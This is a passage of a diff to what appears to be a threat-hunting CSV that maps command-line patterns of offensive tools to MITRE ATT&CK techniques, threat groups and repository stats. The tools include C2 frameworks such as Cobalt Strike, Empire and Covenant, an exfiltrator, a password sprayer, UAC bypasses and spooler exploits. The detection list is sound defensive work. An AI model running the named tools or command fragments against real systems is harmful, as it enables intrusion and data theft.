and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"* spawnto_x64 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* spawnto_x86 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "* spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "* spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "* -spn cifs* -session * -clsid * -secrets*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" -"* -spn cifs/* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -SpooferIP *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -spn cifs/* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -SpooferIP *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* SpoolFool *.dll","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* spoolsploit *","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* spray -ep ex-plan.s365*","offensive_tool_keyword","Spray365","Spray365 is a 
password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" -"* --sql-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* srde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* --sql-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* srde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* ssh2-enum-algos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-auth-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1909,22 +1909,22 @@ "* ssl-poodle.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sslv2.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sslv2-drown.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* SspiUacBypass *","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"* SspiUacBypass *","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "* sstp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* st client wss://*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "* st teamserver *","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"* start covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* start covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"* start_hidden_process*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
